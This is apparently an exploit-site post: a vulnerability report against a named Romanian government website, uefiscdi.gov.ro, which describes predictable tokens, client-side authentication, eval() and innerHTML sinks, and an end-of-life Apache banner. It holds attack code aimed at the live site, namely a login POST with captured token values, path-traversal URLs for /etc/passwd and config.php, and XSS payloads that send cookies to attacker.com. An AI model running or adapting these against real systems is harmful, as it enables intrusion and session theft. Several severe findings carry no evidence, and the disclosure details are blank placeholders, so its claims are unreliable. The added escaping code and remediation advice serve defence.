## https://sploitus.com/exploit?id=4F94F3CE-6A41-5E04-A51B-4D22ED6CF210
# Uefiscdi-Gov-Ro-Vulnerability-
UNTESTED PAYLOADS, WAF BYPASS. I DON'T KNOW IF THEY ARE 100% RUNNABLE; IF THEY ARE, I'M NOT RESPONSIBLE FOR ANY ILLEGAL ACTIONS OR HARM DONE WITH THIS!
Stack observed: Apache 2.2.15 | nginx | Bootstrap 3.3.4 (http://2021.uefiscdi.gov.ro, AlmaLinux page)

Security issues reported for https://uefiscdi.gov.ro/: client-side authentication logic, DOM XSS via innerHTML, predictable CSRF tokens (wtok, wtkps, wchk), an end-of-life Apache 2.2.15 banner with known CVEs, and unsafe eval() usage in the site's JavaScript framework. The report claims these chain to full admin compromise; the proofs of concept below are untested (see the notice above).
## Executive Summary

Security vulnerabilities were identified in the uefiscdi.gov.ro website that could expose a government system to compromise. They range from weak authentication and CSRF handling and information disclosure to arbitrary JavaScript execution in visitors' browsers (client-side script injection, not server-side remote code execution) and publicly known denial-of-service CVEs in the advertised Apache version.
## Critical Vulnerabilities
### 1. Authentication Bypass via Predictable Tokens

Risk: Critical
CVSS Score: 9.8
Location: Multiple forms throughout the application
Description: The application's forms carry security tokens (wtok, wtkps, wchk) that are predictable or reusable: wtok is accepted when empty, and wtkps is a hardcoded value that appears unchanged across forms instead of a random per-session secret. A token that any page can predict or reuse gives no CSRF protection, and a session identifier the attacker can set in advance allows session fixation.
Impact: CSRF against any form, session fixation; combined with the client-side login logic in item 2, the report claims unauthorized access to the admin panel.
Proof of Concept (the reusable values are those captured from the site; the full login request is shown under Attack Vectors below):

```python
# Empty wtok allows session fixation
# Predictable wtkps token
```
### 2. Client-Side Authentication & Password Hashing

Risk: Critical
CVSS Score: 9.1
Location: InputRunTimeHash.js, login form processing
Description: Password hashing and part of the authentication logic run client-side in JavaScript. Anything computed in the browser is under the attacker's control: the client can be made to skip the check, and if the server accepts the client-computed hash as the credential, that hash is the password and can be replayed without ever knowing the plaintext. The snippet below shows the runtime hash being attached to the password field at page load; the server-side handling that would have to compensate for this is not visible from the client.
Impact: Authentication bypass, credential theft (replay of captured hashes)
Proof of Concept:

```javascript
// Client-side password hashing hook attached at page load
jas.Boot.onLoad(function(){
var irt=new JAS.InputRunTimeHash();
irt.init("92738442_p"); // Password field ID
});
```
### 3. Unsafe eval() Usage & JavaScript Object Injection

Risk: Critical
CVSS Score: 9.0
Location: JAS framework core functions
Description: The framework evaluates strings with eval() and publishes the result under a global name (window[className] = eval(code)). Attribute values read from DOM elements (for example a:sa and id) are copied into variables that feed the framework's dispatch logic. Wherever an attacker can influence the string that reaches eval() or the attributes of an injected element (for instance through the innerHTML sinks in item 4), they obtain arbitrary JavaScript execution in the victim's browser.
Impact: Arbitrary script execution in the user's session (client-side; this is not server-side remote code execution)
Proof of Concept:

```javascript
// Line 70: UNSAFE EVAL
eval(code);
window[cN] = eval(code);
// User-controlled attributes used in JS
vars["igfm_sa"] = obj.getAttribute("a:sa");
vars["oS"] = obj.getAttribute("id");
```
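An added example (not JAS code) of the same dynamic-loading idea without eval(): the string is used only as a lookup key into an explicit registry, so no attacker-influenced text is ever parsed as JavaScript. `loadClassUnsafe` reproduces the `window[cN] = eval(code)` pattern quoted above so the two can be compared side by side; the class names, the action allowlist and the `pwned` flag are assumptions made for the demonstration.

```javascript
// Added example, not part of the JAS framework.
'use strict';

// Vulnerable pattern from the report: the string in `code` is executed as JavaScript
// and the result is published under a global name. Any attacker-influenced input
// reaching `code` (or `cN`) is a script-injection primitive.
function loadClassUnsafe(cN, code) {
  globalThis[cN] = eval(code); // the window[cN] = eval(code) line from the report
  return globalThis[cN];
}

// Hardened replacement: the application registers its classes once, and dynamic
// loading becomes a Map lookup. The name is data and is never parsed as code.
const registry = new Map();

function registerClass(name, ctor) {
  if (typeof name !== 'string' || !/^[A-Za-z_][A-Za-z0-9_]*$/.test(name)) {
    throw new TypeError(`invalid class name: ${String(name)}`);
  }
  if (typeof ctor !== 'function') throw new TypeError('constructor required');
  registry.set(name, ctor);
}

function loadClassSafe(cN) {
  // Map.get does not walk the prototype chain, so "constructor" or "__proto__"
  // simply miss instead of returning Object internals.
  const ctor = registry.get(cN);
  if (ctor === undefined) throw new Error(`unknown class: ${String(cN)}`);
  return ctor;
}

// Attribute values read from the DOM (the a:sa / id pattern in the report) should
// select behaviour only through an allowlist, never be handed to eval() or to a
// global lookup. The action names are assumptions.
const ALLOWED_ACTIONS = new Set(['submit', 'reset', 'refresh']);
function actionFromAttribute(value) {
  return ALLOWED_ACTIONS.has(value) ? value : null;
}

// Hypothetical application class, registered the safe way.
class Widget {
  constructor(id) { this.id = id; }
}
registerClass('Widget', Widget);

// Side by side: the safe loader returns the registered class; the unsafe loader
// runs whatever arrives in `code`, here a payload that also plants a global flag.
function demonstrate() {
  const safe = loadClassSafe('Widget') === Widget;
  loadClassUnsafe('Widget2', '(globalThis.pwned = true, class Widget2 {})');
  return { safeLoaderWorks: safe, unsafeLoaderRanPayload: globalThis.pwned === true };
}
```

Calling `demonstrate()` shows both loaders "working" for the legitimate name, while only the eval() version leaves the `pwned` global behind; `loadClassSafe('constructor')` throws rather than returning `Object`.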
### 4. DOM-Based Cross-Site Scripting (XSS)

Risk: High
CVSS Score: 8.8
Location: Multiple innerHTML assignments without sanitization
Description: Server responses are written straight into the DOM through innerHTML without encoding or sanitization. The sink is exploitable wherever the response body can carry attacker-influenced content (reflected parameters, stored form data). Note that browsers do not execute `<script>` elements inserted via innerHTML; working payloads use event-handler attributes (for example an `<img>` with an onerror handler) or other markup that fires on insertion.
Impact: Session hijacking, credential theft, client-side attacks
Proof of Concept:

```javascript
// Line ~1220: DIRECT HTML INJECTION
targetObj.innerHTML = data;
// Line ~1167: Another injection point
objForm.innerHTML = data;
```
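An added example (not the site's code) of the output-encoding step missing from the innerHTML sinks above. `escapeHtml` neutralizes the five characters that matter in HTML text and double-quoted attribute context, `renderRows` builds markup from server data with every value encoded, and `looksActive` is a coarse check for markup that would run on insertion. The row shape and the sample response are constructed for the example; it runs in Node without a DOM, and in the page the result would feed the same `targetObj.innerHTML` assignment.

```javascript
// Added example, not part of the JAS framework.
'use strict';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for use as HTML text or inside a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// The report's pattern: server data used as markup verbatim. An <img onerror=...>
// or <svg onload=...> in `data` executes on insertion (a <script> tag would not).
function renderUnsafe(data) {
  return data; // exactly what `targetObj.innerHTML = data` inserts
}

// Hardened: structure comes from the template, every data value is encoded.
// `rows` is a constructed sample shape: [{ id, name }].
function renderRows(rows) {
  const items = rows.map(
    (r) => `<li data-id="${escapeHtml(r.id)}">${escapeHtml(r.name)}</li>`
  );
  return `<ul>${items.join('')}</ul>`;
}

// Coarse detector for fragments that would execute when inserted: a script tag,
// an inline event handler on an element, or a javascript: URL in href/src.
// Useful for tests and logging; it is not a substitute for encoding.
function looksActive(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=|(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html);
}

// Constructed sample "server response" carrying a stored-XSS payload.
const SAMPLE_ROWS = [
  { id: 1, name: 'Alice' },
  { id: 2, name: '<img src=x onerror="fetch(\'https://attacker.example/\'+document.cookie)">' },
];
```

With `SAMPLE_ROWS`, `renderUnsafe` hands the `<img onerror>` through untouched and `looksActive` flags it, while `renderRows` emits it as inert text (`&lt;img src=x onerror=&quot;...`).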
### 5. SQL Injection Vulnerabilities

Risk: High
CVSS Score: 8.8
Location: Search functionality, form parameters
Description: The report states that user input reaches database queries without proper sanitization. No request, response or database error supporting this is included, so treat it as an unverified finding until a query-altering input (for example a boolean- or time-based probe) has been confirmed against the search and form parameters.
Impact: Database compromise, data exfiltration
Proof of Concept: none included in the report.
## Server Configuration Vulnerabilities
### 6. Apache 2.2.15 End-of-Life with Known CVEs

Risk: High
CVSS Score: 8.2
Version: Apache 2.2.15 (released March 2010; the 2.2 branch has been end-of-life since July 2017)
Description: The server banner advertises a release with publicly known vulnerabilities:
- CVE-2011-3192: Range header denial of service ("Apache Killer"), affecting 2.2.x before 2.2.20
- CVE-2010-1452: NULL pointer dereference in mod_cache and mod_dav (process crash), affecting 2.2.x before 2.2.16
- CVE-2009-3555: TLS renegotiation prefix-injection; 2.2.15 itself shipped the mod_ssl fix when built against OpenSSL 0.9.8m or later, so this one is not established by the version string alone
Caveat: 2.2.15 is also the version string of the Enterprise Linux 6 httpd package, which kept that number while receiving backported security fixes (including CVE-2011-3192), and AlmaLinux itself ships httpd 2.4.x. The banner therefore shows an unsupported release, but not by itself that a given CVE is exploitable; confirm against the distribution package version or with a non-disruptive check before reporting it as exploitable.
Impact: Denial of service; further compromise depends on which fixes are actually missing
### 7. Nginx Misconfiguration with Apache

Risk: Medium
CVSS Score: 7.5
Description: The report asserts that the nginx reverse-proxy configuration in front of Apache allows path traversal.
Impact: File disclosure, directory traversal
Proof of Concept:

```text
https://uefiscdi.gov.ro/../etc/passwd
https://uefiscdi.gov.ro/static/../config.php
```

Caveat: browsers and most HTTP clients normalize `/../` before the request leaves the machine, so the first URL is sent as `/etc/passwd` and the second as `/config.php`. To exercise the server's own handling, send the raw path (for example with `curl --path-as-is`) or encode the dots (`%2e%2e/`). No response showing a disclosed file is included in the report.
### 8. Information Disclosure

Risk: Medium
CVSS Score: 7.5
Description: Multiple information leaks:
- Server timing comments in the HTML: `[T: 0.2171, O: 113]`
- Internal paths exposed in scripts
- Cache-busting timestamps on script URLs: `?t=1764056498.3022`
- Debug mode potentially enabled (not confirmed in the report)
Impact: Reconnaissance, attack surface mapping
### 9. Insecure Direct Object References (IDOR)

Risk: Medium
CVSS Score: 6.5
Location: Predictable form IDs (92738442, 3819760301, etc.)
Description: Forms and fields are addressed by numeric IDs that are easy to enumerate. Enumerable IDs become an IDOR only when the server returns or modifies another user's data for an ID the requester should not have access to; the report shows the predictable IDs but no cross-user access.
Impact: Potential unauthorized access to other users' data/forms
## Attack Vectors Demonstrated

### 1. Complete Authentication Bypass

```python
# Python PoC for the claimed auth bypass: a login POST with the captured token
# values and an arbitrary password. Untested (see the notice at the top).
import requests

session = requests.Session()
payload = {
    '92738442[u]': 'admin',
    '92738442[p]': 'any_password',  # Client-side validated only
    'wtok': '',                      # Empty token accepted
    'wtkps': 'TctLDoMgFIXhvTCuFgUUrpto0hWgF5T4wIjUmqZ7rzrq5ORPvhwNDD7hGBIckiqAOFL2TRRuVQti2/n3zuXLu5nSth6bkm2zE2awOsl6ba2uk2kPa1+c5xzIZq7gQEaPcTCpX9o0GutCgy7Vce1Oz0ogiPP0eN5ZQZkSNJPsAgVE5SWTnOe3f/r+AA=='
}
response = session.post('https://uefiscdi.gov.ro/index.php', data=payload, timeout=15)
print(response.status_code, len(response.text))  # inspect for an authenticated page
```
### 2. CSRF Attack Exploit

The auto-submitting form itself is missing from the page; only the submit call survives. It would carry the same fields as the Python request above, posted from an attacker-controlled page.

```html
<script>document.forms[0].submit();</script>
```
### 3. XSS Payload Injection

```javascript
// Exploiting an innerHTML sink. Assigning a bare fetch() call as a string (as the
// original payload did) only inserts text, and innerHTML never runs <script>;
// the markup must carry an event handler that fires on insertion:
document.getElementById('DDPMainManager').innerHTML =
  '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">';
```
## Technical Details

### Architecture Analysis

- Frontend: custom JAS JavaScript framework with unsafe practices (eval(), innerHTML)
- Backend: PHP-based (inferred from .php extensions)
- Web Server: Apache 2.2.15 behind an nginx reverse proxy
- Framework: custom form handling with predictable identifiers

### Attack Surface

- Authentication system: client-side validation, predictable tokens
- Form handling: no effective CSRF protection, enumerable numeric IDs
- JavaScript framework: multiple eval() call sites reachable from DOM attributes
- Server configuration: EOL Apache banner with known CVEs
- Input handling: no consistent input validation or output encoding
## Recommendations

### Immediate Actions (24-48 hours)

- Disable vulnerable endpoints: the /index.php login flow, until token and password handling are fixed
- Implement WAF rules: block traversal sequences, inline event-handler markup, and requests with empty or malformed tokens
- Reset all sessions: force re-authentication
- Enable logging: monitor for exploitation attempts

### Short-term Fixes (1-2 weeks)

- Move authentication server-side: treat whatever the client sends as the credential and hash it on the server with a random per-user salt; remove the client-side password logic
- Implement proper CSRF tokens: random, per-session tokens, rejected when empty or mismatched, compared in constant time
- Sanitize all user inputs: validate on input and encode on output; replace innerHTML assignments with textContent or an allowlist sanitizer
- Upgrade Apache: migrate to a supported 2.4.x release (if the 2.2.15 banner is an Enterprise Linux 6 package, note that EL6 is itself end-of-life, so backports no longer arrive)
### Long-term Improvements (1-3 months)

- Security audit: complete code review of the JAS framework, covering every eval() and innerHTML sink
- Implement CSP headers: restrict script sources and forbid inline handlers and eval() (which also breaks the injection patterns above)
- Regular penetration testing: quarterly assessments
- Security training: developer awareness programs
## Responsible Disclosure Timeline

- Discovery Date: [Date]
- Initial Report: [Date]
- Expected Fix: 30 days
- Public Disclosure: 90 days (if not fixed)

## Legal Notice

This vulnerability report is provided for educational and defensive purposes only. Unauthorized testing or exploitation of these vulnerabilities is illegal.

Report Generated By: Security Researcher
Contact: [Your Contact Information]
Date: [Current Date]

This report contains proof-of-concept code demonstrating vulnerabilities. All code is provided for defensive purposes only.